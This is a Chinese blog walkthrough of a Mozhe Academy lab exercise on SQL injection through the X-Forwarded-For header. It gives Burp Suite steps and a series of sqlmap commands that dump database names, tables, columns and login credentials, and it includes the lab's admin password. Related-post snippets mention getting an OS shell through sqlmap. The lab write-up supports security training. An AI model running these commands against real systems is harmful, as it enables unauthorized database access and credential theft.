墨者学院-X-Forwarded-For注入漏洞实战

最新推荐文章于 2023-02-10 01:31:25 发布
最新推荐文章于 2023-02-10 01:31:25 发布
阅读量363 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100556710
版权

X-Forwarded-For注入漏洞实战

难易程度:★★
题目类型:SQL注入
使用工具:FireFox浏览器、kali

1.打开靶场,使用burpsuite,登录,截包。
send to repeater,在下方加入一句X-Forward-For:*,右键save item,导出文件。
在这里插入图片描述
2.打开kali,使用sqlmap爆库名。
输入sqlmap -r 1.txt --current-db --batch
在这里插入图片描述
得到库名webcalendar

3.接着爆表名,sqlmap -r 1.txt -D webcalendar --tables --batch
在这里插入图片描述
得到两个表名,肯定是user。

4.再接着爆列名,sqlmap -r 1.txt -D webcalendar -T user --columns --batch
在这里插入图片描述
5.最后显示username和password,输入sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch
在这里插入图片描述
得到两组账号密码,组合一下得到正确账号密码。

6.账号为admin,密码为42899124,登录获取key。
在这里插入图片描述

JimWu95
关注
墨者学院X-Forwarded-For注入漏洞实战
痴人说梦梦中人
11-13 385
1、 使用SQLmap,构造XFF,爆库,爆表,爆列,dump,md5解密获得密码登陆,获取key。 2、 爆库 –batch #从不询问用户输入,使用所有默认配置。 -r 从一个文件中载入HTTP请求 3、 爆表 4、 爆列 5、 Dump 6、 登陆获取key ...
墨者学院----X-Forwarded-For注入漏洞实战
最新发布
weixin_53736204的博客
07-23 342
墨者学院----X-Forwarded-For
墨者学院 - X-Forwarded-For注入漏洞实战
多崎巡礼的博客
08-28 1459
burp抓包,将抓到数据存为  xxx.txt 爆数据库 sqlmap.py -r xxx.txt --dbs --batch 爆表名 sqlmap.py -r xxx.txt -d 数据库名 --table --batch 爆表中的字段 sqlmap.py -r xxx.txt -d 数据库名 -t 表名 --columns --batch 爆字段中的值 sqlmap.py -r ...
墨者】X-Forwarded-For注入漏洞实战
weixin_48621644的博客
09-11 1328
小羊学安全 任重而道远 ~
墨者学院 ——X-Forwarded-For注入漏洞实战
知足且坚定,温柔且上进
02-09 700
前言: 小白昨天在利用sqlmap注入的时候,死活不成功(连接超时),把我搞崩溃了,今天又试了一下还是如此。 当我把小飞机(科学上网)关了,再次尝试,成功了!所以如果和我有一样状况的新手们可要注意这个问题哦。 步骤一: 利用burpsuite抓包并且发送到reperter, 添加x-forwarded-for:* 1.将Request的Raw内容复制到自己新建的一个txt文档,命名为x...
墨者学院】X-Forwarded-For注入漏洞实战
hehigoxqc606的博客
08-31 906
墨者学院】X-Forwarded-For注入漏洞实战 漏洞原理: 利用HTTP头部注入、sqlmap注入等方式,爆破数据库表中的用户账号和密码,以登陆系统,很有可能对系统有下一步的破坏。 实战过程: 第一步:访问链接 第二步:抓取数据包,可以看到登陆失败,并提示登陆的IP地址 第三步:利用X-Forwarded-For头伪装127.0.0.1进行测试 第四步:复制RAW文件到xff.txt中,这里构造的X-Forward...
墨者学院09 X-Forwarded-For注入漏洞实战
weixin_42789937的博客
02-10 582
墨者学院09 X-Forwarded-For注入漏洞实战,参考大佬wp,对于显错注入整理了手工和sqlmap两种注入流程~
使用nginx后如何在web应用中获取用户ip及原理解释
臻心依旧
08-28 2420
http://gong1208.iteye.com/blog/1559835   使用nginx后如何在web应用中获取用户ip及原理解释                                                                                                  -------gongyong   问题背景: 在实际
x-forward-for:X-Forwarded-For标头浏览器扩展
01-30
x转发 X-Forwarded-For标头浏览器扩展 得到它 或
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
x-forward-for详解
热门推荐
真理部
10-09 1万+
http://www.cnblogs.com/xdjackfeng/p/3514120.htmlx-forward-for
x-forward-for和逻辑漏洞
weixin_48776804的博客
02-15 911
x-forward-forX-Forwarded-For逻辑漏洞 X-Forwarded-For (XFF)是用来识别ip地址 使用sqlmap跑 包的内容 POST /index.php HTTP/1.1 Host: 219.153.49.228:42344 X-Forwarded-For:127.0.0.1* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept:
X-Forward-For和Referer的相关知识点
qq_43511094的博客
03-21 2040
X-Forward-For和RefererX-Forward-ForReferer 前言 X-Forward-For和Referer通常出现在请求头环节,因为有些服务器会有求必须是特定的Referer或者特定的X-Forward-For,所以我们抓包之后要自己加入这两个参数,并修改他们的值 X-Forward-For X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端最真实的IP。只有在通过了HTTP 代理或者负载均衡服务器时才会添加该项。它不是RFC中定义的标准请求头信
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 3291
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
正向代理,反向代理,nginx负载均衡,X-forward-for
qq_35370923的博客
11-02 786
正向代理:访问一个网站,之前访问另一服务器,这个服务器代替我们访问,然后把结果返回给我们。 反向代理:服务器端在接收请求之前,一般通过nginx负载均衡向多个服务器转发请求。 nginx负载均衡: nginx作为一个比较高效的http请求处理软件,可以用它接受某个服务器地址的所有请求,再根据配置的权重将这些请求转发到其他服务器,防止一个服务器处理高并发的请求出现宕机问题。 X-forward-fo...
4-Web安全——通过x-forward-for获取真实ip(入侵溯源)
网络安全
03-28 6186
参考资料:44-http协议 x-forward-for是http请求的一个字段,该字段表示客户端的IP地址,一般称为“XXF”头,服务端通过这个头可以知道客户端的真实或代理IP。x-forward-for字段虽然没有写入RFC标准,但已经应用到http协议中成为一个实施标准了。 x-forward-for字段的格式为: x-forward-for:client1,proxy1,proxy2,proxy3 该字段的ip地址值以逗分隔,其中client1代表真实的客户端的ip地址,...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值